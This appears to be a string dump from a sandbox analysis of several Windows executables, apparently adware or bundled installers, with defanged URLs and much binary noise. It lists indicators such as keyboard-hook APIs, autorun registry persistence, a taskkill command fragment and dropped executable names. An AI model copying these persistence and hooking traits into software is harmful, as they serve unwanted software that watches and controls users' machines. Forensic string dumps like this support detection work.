" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:FB46B4F2111511E3B7049AB4CCF4786E" xmpMM:DocumentID="xmp.did:FB46B4F3111511E3B7049AB4CCF4786E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FB46B4F0111511E3B7049AB4CCF4786E" stRef:documentID="xmp.did:FB46B4F1111511E3B7049AB4CCF4786E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:22572050111611E3881AFF86113FD3B2" xmpMM:DocumentID="xmp.did:22572051111611E3881AFF86113FD3B2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2257204E111611E3881AFF86113FD3B2" stRef:documentID="xmp.did:2257204F111611E3881AFF86113FD3B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
2014/01/15
#vb6chs.dll
.OsenXPComboBox
.CommandButton
.LbDate
.OsenXPDTPicker
.OsenXPSpin
shdocvw.dll
WebBrowser
%Program Files%\VB
\VB6.OLB
#Web1
0%System%\shdocvw.oca
%System%\mshtml.tlb
URLEncode1
time.dll
wininet.dll
InternetOpenUrlA
comctl32.dll
winmm.dll
%System%\msvbvm60.dll\3
WriteIniKey
GetIniKey
DelIniKey
advapi32.dll
RegCloseKey
RegOpenKeyA
Replace.dll
Password
GetAsyncKeyState
SetWindowsHookExA
UnhookWindowsHookEx
VBA6.DLL
msvbvm60.dll
olepro32.dll
msimg32.dll
shell32.dll
F%System%\stdole2.tlb
GdiplusShutdown
gdiplus.dll
zlib.dll
zlib1.dll
__vbaStopExe
KeyDown
KeyPress
KeyUp
cmdBrowse
cmdClipBoard
comdlg32.dll
AddMsg
DelMsg
\ctl\WinSubHook.tlb
IsSysShadowEnabled
GetProcessHeap
SetMsgHook
SetMsgUnHook
ole32.dll
==?==?==?==?==?
==?==?==?
2003/07/13
strURL
strKey
KeyWord
uMsg
sSrvCmd
sSrvPassword
KeyCode
KeyAscii
Occurs when data is dropped onto the control via an OLE drag/drop operation, and OLEDropMode is set to manual
Occurs when the mouse is moved over the control during an OLE drag/drop operation, if its OLEDropMode property is set to manual
Return whether the OS supports layered windows.
Return whether the OS settings suggest that shadows should be employed. Only truly valid on Windows XP, Windows 2000 will always return True. It is up to the programmer as whether this setting is honored.
Return whether we're running under Windows XP.
Returns a handle (from Microsoft Windows) to an object's window.
Returns the number of items in the list portion of a control.
Occurs when the user presses and releases an ANSI key.
Qh$%C
Rh0%C
PhT%C
Qhd%C
Qh0%C
FTPj
\tclock.ini
tray_yes.png
tray_no.png
\time.dll
Software\Microsoft\Windows\CurrentVersion\run
.exe" /t
hXXp://VVV.weather.com.cn/weather/
.shtml
cmd.exe /c taskkill /im
C:\\Program Files\\Internet Explorer\\IEXPLORE.exe
huangli.xml
\journey.exe
\kindness.exe
\kingdom.exe
\knack.exe
\knead.exe
\knee.exe
1.png
setting.ini
ddd.png
\Replace.dll
\Replace64.dll
\uTray.exe
city.txt
toolbar_hover (3).png
2.png
3.png
button_p_pushed.png
button_p_hover.png
00:00:00
hXXp://VVV.baidu.com/s?wd=天气预报&rsv_bp=0&ch=&tn=baidu&bar=&rsv_spt=3&ie=utf-8&rsv_sug3=5&rsv_sug4=565&rsv_sug1=5&oq=天气&rsv_sug2=0&f=3&rsp=0&inputT=9
hXXp://VVV.baidu.com/s?wd=
\Weather_none.png
18:00:00
08:00:00
Refresh_pushed.png
Refresh_normal.png
Refresh_hover.png
<Keys>
</Keys>
<Key ID="
{1D5BE4B5-FA4A-452D-9CDD-5DB35105E7EB}
.cb_Callback
*gif;*.bmp;*.jpg;*.jpeg;*.ico;*.cur;*.wmf;*.emf;*.png
*.bmp
*.gif
*.ico;*.cur
*.jpg;*.jpeg
*.wmf;*.emf
*.png
Windows Meta File
Provider=Microsoft.Jet.OLEDB.4.0;Data Source=
\uCalendar\db2.mdb;Persist Security Info=False
Msxml2.XMLHTTP.3.0
application/x-www-form-urlencoded
\uTray.exe"
0000000
DragFullWindows
0123456789
\uCalendar\input.png
\uCalendar\button_3a.png
\uCalendar\button_3b.png
\uCalendar\tip.png
\uCalendar\NewIcons007.png
\uCalendar\button_state5.png
\uCalendar\setting.ini
(C) hXXp://VVV.tqshopping.com/
weathers.exe

mankind.exe_2904_rwx_01C61000_00018000:




%SQVW
<.tBwIJ;
<.tC<9w:<0r6,0f
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
kernel32.dll
hXXp://VVV.baidu.com/
msvcrt.dll
NTSHRUI.DLL
COMCTL32.DLL
shell32.dll
\QZaweewertghebh.dat
WScript.Shell
WScript.Shell_ERR
setting.ini
set.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
VBScript.RegExp
RegOpenKeyExA
CreateDialogIndirectParamA
ExitWindowsEx
SetWindowsHookExA
UnhookWindowsHookEx
A.eMk$)B$)B$)B$)B$)B$)B$)B2$!
.text
`.data
.link
.rloc
NTSHRUI.DL
.lnk[she
.baidu.
KeyG
.dN"u
.linke

setup_2949-14598.exe_612:




.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
MusicPlayer.exe
BoxNews.exe
Unins.exe
PlayerUpdate.exe
%Program Files%\MusicPlayer
%s\%s -mini
_%d%d%d
%s\%s
%s\SysConfig.ini
hXXp://VVV.yinyue.fm/
%ProgramFiles%\Internet Explorer\iexplore.exe
%s.lnk
Software\Microsoft\Windows\CurrentVersion\Run
"%s\%s" -mini
\SysConfig.ini
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall\
%s\Data\Setup.ini
_pos%d | len%d and Channel %s ||
%d-%d-%d
\yinyue.fm\
\Release\SetupApp.pdb
MSIMG32.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCreateKeyExA
RegOpenKeyExA
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
gdiplus.dll
SHLWAPI.dll
PSAPI.DLL
GetCPInfo
zcÁ
%Program Files%\fjwyusp\hzsoft\setup_2949-14598.exe
audio.dll
s.AYv B
!.uQ<
\.gbC
K.uq1
E9%u77/
avcodec-54.dll
jjiKS.iKa
H.St09O
.dVUr
9d%F(
5Y.TM
e1.nej
.Lb=RJ\5/
`Z.HK
#a.jn8i=
o%Xq;
\.vkH9
.Jm[M
<,*.jad
X.wk 
%F&s'%
%srW"
.Ax;4
d4yÊP2B
4**":*2*:
n>-5}
Z3.nd
Q-0}*
.QDFS
%x%nFX
9 .Hw$
avcore.dll
11%uk
x.OBi;S
?T-L}!
.XZ\8
avformat-54.dll
;%fORvY
}.fol
=".BWa
.bW~&
B.qbJ
D6%sYA
".uVG1E
W-U
.aep-e
5%c:c
=.Zfe
avutil-52.dll
.Owpt
]p?%x
%6x>M
\.JdD
%F&~K
3%xv{9
9J.wF{
i:.fads
-SXnZwu}
}.QY$
Yhfo%D
%S! 8
.bc &
%xi]=
JR %c
-RSy}
1.oPOR
%C]h9
81.FC
uDPA
k%C\P
.Oqn.q}
%D[wWE
0-Z?:3.rI
,pt.bV
Xw%dVh
mU;xV.EhM
<C%S{"
gq\%X
Z.ff\
.ttgr
dp.gqM 
.lo;|
(5.Aa
.PX&A
i,.HO
#\7%f
3#%C:2
.xOxR
.Lti"
tNUdpb
.AtQ| 
e0dC%d
W%dOx
.WnMY
i.MH?H
.vb{Y
(.LAr5@
E.Eb.
0`.XNCg
.GnT -
%SaL8
7uB^.Xt?
on9.sE)
m.pW_
8.msa
]VP.xx
;I.Hl
?^%xZ3}!
.QWsC
$[.gpW
.Sq4E
B.Lli
.IO$d
9U.fP^t
V5_.Sk
wL.zP
F.CHkY
yq.rT#
`R}c%c
{.eKY>h
?)%s\0
3%sU@
channels.xml
Data/client.ini
Data/dh.ini
Data/setup.ini
Data/version.ini
DuiLib.dll
]F<-q4}
"% !]""!
.bt,m]
.OXS[pqo
^%X4nuW
xh.sV
X].zTZ
H.RAjw
.eIIbB
~ 3\%D
QOQT$6j.Eu
.d96.Bm
g%FTc
.DQ2\
'.YFN
\r.RR
6.jHLt
cqR.jib9
favorfm.xml{
libav.dll
-y.Rn
\.ln(D
 *.VE
&%U[5
Pa%U5
D7}u.Wl
LlWlp
.%X6~
E,-H}v
4x.pa
_sI
3.DPb
4^%UV]$
.Mz()
c&h%8xeO
.hIZSh
.If2f
y~cMd
l.VS6
h[r.rP4
.TJSdn;
.ou\`
.BG]V
xH.arO
Y%xS#
h%u%l
V1%Xi
hj.LdO
mSG0R
.Zuxf
tCPS
$;y)#%s
.QsvC
.VvC v
lH)Qk%c
4n.Ei
,GA.GS
D<%X,
%4u)K
x:s%D}
o#%sY 
lh.uwQ
.jH3{
%CG_Pj
i.kK[s
pthreadGC2.dll
R~.wo
Skin/125x125.jpg
L.Xkj
Skin/320x225.png
Skin/astop.png}W
Skin/AutoRunTipFrame.xml
Skin/back.png
Skin/bg2.png}SOh
Skin/bg_2.png}S]H
Skin/bk.png|
I[CsS%SC
.qO9M
t%7UfEa
zC%f 
]#%Sj
J%XDU@}T
8i.aV;
%fiHZZ9
3Nv%F
R%cV}V
mD%SK'l9
QC
Skin/border.png
L9q
Skin/btn-anonymity.png}
[).XF
'q.CAqK
Skin/btn-delete.png
Skin/btn-fav.png}Wy8
Skin/btn-login.png}
Skin/btn-login2.png
[%*,\4>66
%S;&DN
Skin/btn-next.png
Skin/btn-pause.png}X
Skin/btn-play.png
Skin/BtnHidePlayList.png
Skin/BtnRightTop.png
Skin/btn_9k.png}Wy8
Skin/btn_bd.png}Xy8
Skin/btn_close.png}Vy8
Skin/btn_comm.png
Skin/btn_db.png}W
Skin/btn_fh.png}XwT
Skin/btn_kw.png}
Skin/btn_ok.png}W
l[O{#. %x
Skin/btn_ok_blue.png
Skin/btn_ok_red.png}
Skin/btn_sc.png
=%uIS
Skin/btn_xm.png}X
Skin/button.png
Skin/channel.png
Skin/close.png
Skin/collection.png
ðxEuJxg
Skin/dash.png}SM
Skin/DefaultUserImage.jpg
%S]wF
Skin/downd.png
Skin/downda.png
Skin/downdahover.png
Skin/DownLoadProgressForeImage.png
Skin/exit.png}U
Skin/fbcaptionbk.png
Skin/feedback.png}V
>/.Yhi
Skin/forgettt.jpg
Skin/FrmConfig.xml
Skin/frmdownmenu.xml
Skin/FrmDropDownMenuFrame.xml
Skin/FrmFeedBack.xmle
Skin/FrmHotKeyTip.xmlu
Skin/frmlogin.xml
Skin/FrmLrc.xml
Skin/FrmLrcChild.xmlU
Skin/FrmMenuFrame.xml
Skin/frmplayer.xml
Skin/frmplaylist.xml
Skin/frmProgressToolTip.xmlUPKN
Skin/FrmSystemMenuFrame.xml
Skin/frmWebBrowser.xml=
Skin/frmWindowLrc.xml5
Skin/headimg.png}
d%U(.6
tG%C*
Skin/history.png
Skin/home.png}VgTS
Skin/hotkeytipbk.png
Skin/icon.png
Skin/input-password.png}U
Skin/input-user.png
Skin/like.png
!\Un%x
Skin/list.png
Skin/lista.png
D-wjÓ 
Skin/listahover.png
Skin/list_item.xml
Skin/list_item_bg.png}S
Skin/list_pause.png
Skin/list_play.png
Skin/list_scroll_bar.png}SmH
Skin/list_scroll_bar2.png}S_H
{òC
Skin/list_title_bg.png}S
Skin/loading01.png
Skin/loading02.png
Skin/loading03.png
Skin/loading04.png
Skin/LoginBk.png
%S%hu.Y
g).IQ
Skin/LrcBk.png
u-3H}.
Skin/lrclist.png}Xy8
@.xn?
Skin/lyricdelete.png
Skin/lyricdeletea.png
Skin/lyricdeletea2.png
Skin/LyricFrameVoice.png
Skin/lyriclike.png
Skin/lyriclikea.png
Skin/lyriclikea2.png
Skin/lyricmute.png
Skin/lyrictoplay.png
Skin/mainframeshadow.png
k/.ea"#>Nn
W%u3>C
f9Ky.RW`
3.jUj
Skin/max.png
Skin/menu.png
Skin/MessageBox.xml
Skin/min.png}SOh
Skin/mine.png
Skin/minea.png
Skin/mineahover.png
Skin/mini.png
mE)iVA.nP
Skin/more.png}SOH
Skin/musiclibrary.png
Skin/next.png}ViTSg
Skin/next0520.png
Skin/normalVolume.png}U
%DZRlj
Skin/play0520.png
Skin/play2.png
Skin/playerbg01.png
Skin/playerbg02.png
Skin/playerlist.png}X
Skin/playersidebg.jpg
Skin/playinging.jpg
Skin/playinginga.jpg
".Wlm
Skin/playingnext.png
Skin/playingplaying.jpg
Skin/playingprev.jpg
Skin/playingpreva.jpg
Skin/playingrandom.jpg
Skin/playingrandoma.jpg
Skin/playingvoice.png}V
Skin/PlayProgressForeImage.png
Skin/pop_bkimage.png}U
Skin/power.png}XgTS
,&.,&#/!./*
Skin/prev.png}ViTS
Skin/prev0520.png
Skin/prevention.png
Skin/progresstooltip.png
Skin/progresstooltipbk.png
.ZfDrhe
T%s61K
m;.rA
Skin/progress_fore.png
Skin/pushedVolume.png
Skin/random.jpg
Skin/random01.jpg
Skin/random01a.jpg
Skin/random01hover.jpg
Skin/random02.jpg
Skin/random02a.jpg
Skin/random02hover.jpg
Skin/random03.jpg
Skin/random03a.jpg
Skin/random03hover.jpg
Skin/random0520.png
Skin/reflash.png
Skin/remembertt.jpg
Skin/scrollbar.png
Skin/search.png
E.Eg/&
Skin/SelectColor_SliderBar_Thumb.png
Skin/SetTipFrame.xml
5).uZ
Skin/slider_bg.png
Skin/sound (2).jpg
Skin/sound.jpg
Skin/sound100.jpg
Skin/steup.png}
Skin/suspensionbig.png
Skin/suspensionbiga.png
Skin/suspensionbigahover.png
Skin/suspensionclose.png
Skin/suspensionclosea.png
Skin/suspensioncloseahover.png
Skin/suspensionfeedback.png
Skin/suspensionfeedbacka.png
Skin/suspensionfeedbackahover.png
Skin/suspensionlogin.png
Skin/suspensionmin.png
Skin/suspensionmina.png
Skin/suspensionminahover.png
Skin/suspensionset.png
Skin/suspensionseta.png
Skin/suspensionsetahover.png
Skin/suspensiontop.png
Skin/suspensiontopa.png
Skin/suspensiontopahover.png
.png}U
Skin/system_menu_btnexit.png
Skin/system_menu_btnfeedback.png}V
Skin/system_menu_btnmin.png
;7%2uf
Skin/system_menu_btnmini.png
Skin/system_menu_btnsteup.png}
Skin/system_menu_btntop.png}W
Skin/sys_check_btn.png
Skin/sys_check_btn_blue.png
Skin/sys_check_btn_red.png
Skin/tab_comm.png
Skin/tooltipbk.png
Skin/update.xml
Skin/voice00528.png
Skin/voice0520.png
Skin/voice0a0528.png
Skin/voice1000528.png
Skin/voiceall0528.png
Skin/WindowLrcbkIamge.png
source.dll
u.lvt
8"%SV
.Ii*J
.DOd]
swresample-0.dll
5b$;.NF
t%xxX
j%6uW
a%dqa2
d(@
.Fe/|NT4
SysConfig.iniU
.SFoax
PuDp
.wD3p
<.cuI
0P~%u
77m%s
| .ow
6.DX@IO
Ì"&
2.HvdX
{U
e,.ty{Z,
\ `}] 7[
m.To}g
%uX:$@
favorfm.xml
Skin/astop.png
Skin/bg2.png
Skin/bg_2.png
Skin/bk.png
Skin/btn-anonymity.png
Skin/btn-fav.png
Skin/btn-login.png
Skin/btn-pause.png
Skin/btn_9k.png
Skin/btn_bd.png
Skin/btn_close.png
Skin/btn_db.png
Skin/btn_fh.png
Skin/btn_kw.png
Skin/btn_ok.png
Skin/btn_ok_red.png
Skin/btn_xm.png
Skin/dash.png
Skin/exit.png
Skin/feedback.png
Skin/FrmFeedBack.xml
Skin/FrmHotKeyTip.xml
Skin/FrmLrcChild.xml
Skin/frmProgressToolTip.xml
Skin/frmWebBrowser.xml
Skin/frmWindowLrc.xml
Skin/headimg.png
Skin/home.png
Skin/input-password.png
Skin/list_item_bg.png
Skin/list_scroll_bar.png
Skin/list_scroll_bar2.png
Skin/list_title_bg.png
Skin/lrclist.png
Skin/min.png
Skin/more.png
Skin/next.png
Skin/normalVolume.png
Skin/playerlist.png
Skin/playingvoice.png
Skin/pop_bkimage.png
Skin/power.png
Skin/prev.png
Skin/steup.png
Skin/system_menu_btnfeedback.png
Skin/system_menu_btnsteup.png
Skin/system_menu_btntop.png
SysConfig.ini
!#~!#}!#{!#z!#x!#v!#t!#q!#p!#n!#m!#k!#i"$g"$e"$b"$b"$_"$]"%["%Z"%X"%V"%T"%S"%Q"%O"%N"%M"%K"%J"%H"%F"%F"%D"%C"%B"%@"%@"%?"$="%<"%;"%:"%9"%8"%8"%8"%8"%7"%7"%6"&5"&4"&4"&4"&4"&3"&2"&2"&2"&2"&2"&1"&1"&1"&1"&1"&1"&0"&0"&/"&/"&/"&/"&/"&/"&/"&/"&0"&0"&0"&0"&0"&/"&/"&0"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&/"&."&."&."&."&."&."&."&."&."&."&."&."&."&."&."&-"&-"&-"&-"&-"&-"&-"&-"%-"%-"%-"%-"%,"%,"%,"%,"%,"%,"%,"%,"%,"%,"%,"%,"%,"% "% "% "% "% "% "% "% "% "% "% "%*"%*"%*"$*"$*"$*"$*"$*"$*"$*"$*"$*"$)"$)"$)"$)"$)"$)"$)"$)"$)"$)
!"g#$m#$p#%r#%t#%v#%x#%{#%|#%~#%
%-}%-|%-z%-x%-v%-t%.s%.r%.o%.m%.l%.j%.i%.h%.f%.d%.d%.b%/b%/_&/^&/]&/]&/[&0Z&0Y&0Y&0W&0W&0V&0U&0T&1T&1S&1S&1R&1Q'1R'1R'1R'1Q'1P'1P'1P'1O'1P'1O'2O'2N'2O'2N'2N'2O'2O'2O'2N'2O'2O'2O'2N'2O'2O'2O'3N'3O'3O'3O'3O'3O'3P'3O'3P'3P'3P'3P'3P'3O'3P'3P'3P'3P'3P'3P'3P'3Q'3Q'3P'3P'3P'3P'3P'3O'3O'3O'3O'3O'3O'3O'3O'3N'3N'3N'3N'3N'3N'2M'2M'2M'2M'2M'2L'2L'2L'2L'2L'2K'2K'2K'1K'1K'1J'1J'1K'1J'1J'1I'1I'1J'1I'1H'1H&1H&1H&1H&0H&0H&0G&0G&0G&0F&0F&0F&0F&0F&0F&0E&0E&/E&/E&/D&/D&/D&/C&/C&/C&/C&/B&/B&.B&.B&.A&.A&.A&.A&.@&.@&.@&.?&-?&.?&-?&->&->&->&-=&-=&-=
#k!%r!%u!%w!%y!%{!%
# }# {# y#,w#,v#,s#,q#-p$-n$-l$-k$-j$-h$-g$-f$-e$-c$.b$.a$.`$.^$.]$.\$.\$.[$.Z$/X%/X%/W%/V%/V%0U%0T%0T%0S%0S%0R%0R%0Q%0Q%0R%0Q%0Q%1R%1P%1P%1P%1P%1O%1O%1O%1O%1O%0O%1O%1P%2O%2P%2P%2P%2O%2O%2O%2O%1P%1P%1P%2P%2P%2P%2P%2P%2P%2P%2Q%3Q%3P%3P%3Q%3Q%3Q%3Q%2Q%2Q%2Q%2R%2R%2Q%2Q%3Q%3Q%3Q%3P%3P%2P%2P%2P%2P%2P%2Q%2O%2O%1O%1P%1P%1O%2O%2O%2O%2N%2N%2N%2N%1M%1M%1M%1M%1M%1M%1L%1L%1L%1L%1K%1K%1K%0K%0K%0J%0J%0I%0I%0I%0I%0I%0I%0H%/G%/G%/G%/G%/G%/G%/F%/G%/F%/E$/E$/F$.E$.E$.E$.E$.D$.D$.D$.C$.C$.C$.C$-B$-B$-A$-A$-A$-A$-A$-@$-@$-@$,?$,?$,?$,?$,>$,>$,=$,=
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
7 7$7(7,7
mscoree.dll
AKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.0.0.0
SetupApp.exe

AlmDay.exe_1016:




.text
.rdata
.data
.rsrc
.aspack
.adata
t.VVUh
M SSh
F SSh
t$\sshLzJ
inflate 1.2.3 Copyright 1995-2005 Mark Adler
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
GetAsyncKeyState
GetKeyState
USER32.dll
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegCreateKeyA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
OLEAUT32.dll
MSVCP60.dll
WS2_32.dll
WININET.dll
SensApi.dll
IMAGEHLP.dll
NETAPI32.dll
MSIMG32.dll
UnregisterHotKey
RegisterHotKey
SetWindowsHookExA
UnhookWindowsHookEx
ole32.dll
GdiplusShutdown
GdipSetImageAttributesColorKeys
gdiplus.dll
AlmDay.exe
Range: bytes=%d-%d
Range: bytes=%d-
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Cookie: %s
Host: %s
POST %s HTTP/1.1
GET %s HTTP/1.1
%s %d
.PAVCException@@
0900936iso-ir-581028598iso_8859-81201255iso_8859-8-i1200932cswindows31j
0628597greek81201258windows-1258
1201257windows-12570738598logical
1201256windows-12560651932euc-jp
1201255windows-1255
2701143x-ebcdic-finlandsweden-euro1201254windows-1254
0801251x-cp12511201253windows-12531400949ks_c_5601_19871528599iso_8859-9:1989
0801250x-cp12501201252windows-1252
1201251windows-12511528598iso_8859-8:1988
1201250windows-12502301149x-ebcdic-icelandic-euro
1150220iso-2022-jp1100874windows-874
1901145x-ebcdic-spain-euro1620127iso_646.irv:1991
0551932x-euc1250221_iso-2022-jp1000932csshiftjis
http-equiv
<>=\/?!"';
(%d nulls removed)
length %d
to length %d
to %d bytes
from length %d
from byte length %d
FQueryInterface failed! ctrl: %d
Can't find the ctrl: %d
SearchConfig.ini
soft.inf
Software\Microsoft\Windows\CurrentVersion\Run
d-d-d
XXXXXX
menu_bg.png
menuseparator.png
menuright.png
menuselectbar.png
menurmark.png
TipsConfig.ini
2.0.3
cybercafe.conf
data\data.bin
AlmDayQuick.exe
mnconf.conf
%s %d %d %d
User32.DLL
btn%d_count
btn%d_image
btn%d_chage
%d %d %
%d %d
progressShadow
0x%X %d
%d %d %d %d
%X %X
colorkey
isshow
layer_%d
x=%d,y=%d
ui/empty.png
_DeleteElem(): item=%d, elem=%d, type=%d, nType=%d
1.2.3
fiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:03801174072068118C4BA35E7E3A55CB" xmpMM:DocumentID="xmp.did:8C949BBF704811E392C8F88113FD2719" xmpMM:InstanceID="xmp.iid:8C949BBE704811E392C8F88113FD2719" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0A801174072068118C4BA35E7E3A55CB" stRef:documentID="xmp.did:03801174072068118C4BA35E7E3A55CB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
%XZ^69
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:03801174072068118C4BA35E7E3A55CB" xmpMM:DocumentID="xmp.did:8C949BC3704811E392C8F88113FD2719" xmpMM:InstanceID="xmp.iid:8C949BC2704811E392C8F88113FD2719" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0A801174072068118C4BA35E7E3A55CB" stRef:documentID="xmp.did:03801174072068118C4BA35E7E3A55CB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>&_OM
kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
mfc42.dll
msvcrt.dll
gdi32.dll
advapi32.dll
shell32.dll
comctl32.dll
oleaut32.dll
msvcp60.dll
ws2_32.dll
sensapi.dll
imagehlp.dll
netapi32.dll
msimg32.dll
2, 0, 0, 3

AlmDayQuick.exe_2908:




.text
.rdata
.data
.rsrc
.aspack
.adata
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
SHELL32.dll
OLEAUT32.dll
GdiplusShutdown
gdiplus.dll
MSVCP60.dll
WS2_32.dll
WININET.dll
SensApi.dll
NETAPI32.dll
IMAGEHLP.dll
MSIMG32.dll
GetWindowsDirectoryA
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegQueryInfoKeyA
ADVAPI32.dll
ShellExecuteA
ole32.dll
soft.inf
config.ini
AdsShowTime
MaterAddSrcUrl
Range: bytes=%d-%d
Range: bytes=%d-
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Cookie: %s
Host: %s
POST %s HTTP/1.1
GET %s HTTP/1.1
%s %d
.PAVCInternetException@@
0900936iso-ir-581028598iso_8859-81201255iso_8859-8-i1200932cswindows31j
0628597greek81201258windows-1258
1201257windows-12570738598logical
1201256windows-12560651932euc-jp
1201255windows-1255
2701143x-ebcdic-finlandsweden-euro1201254windows-1254
0801251x-cp12511201253windows-12531400949ks_c_5601_19871528599iso_8859-9:1989
0801250x-cp12501201252windows-1252
1201251windows-12511528598iso_8859-8:1988
1201250windows-12502301149x-ebcdic-icelandic-euro
1150220iso-2022-jp1100874windows-874
1901145x-ebcdic-spain-euro1620127iso_646.irv:1991
0551932x-euc1250221_iso-2022-jp1000932csshiftjis
http-equiv
<>=\/?!"';
(%d nulls removed)
length %d
to length %d
to %d bytes
from length %d
from byte length %d
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
icourl
%ProgramFiles%\Internet Explorer\iexplore.exe
ShellUrl
KERNEL32.DLL
\winhlp32.exe
{X-X-X-XX-XXXXXX}
User32.DLL
CWebBrowser2
kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
mfc42.dll
msvcrt.dll
shell32.dll
msvcp60.dll
ws2_32.dll
sensapi.dll
imagehlp.dll
gdi32.dll
advapi32.dll
2, 0, 0, 3
AlmDayQuick.exe

Application Dataypfbyfgmr.exe_2796:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.4.2)
Inno Setup Messages (5.1.11)
user32.dll
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
MsgWaitForMultipleObjects
ExitWindowsEx
comctl32.dll
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x

Application Dataypfbyfgmr.tmp_2860:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
%s_%d
windows
PasswordChar
OnKeyDown,
OnKeyPress
OnKeyUpD
ssHorizontal
OnKeyUp
OnKeyUp\nA
uxtheme.dll
comctl32.dll
RegDeleteKeyExA
advapi32.dll
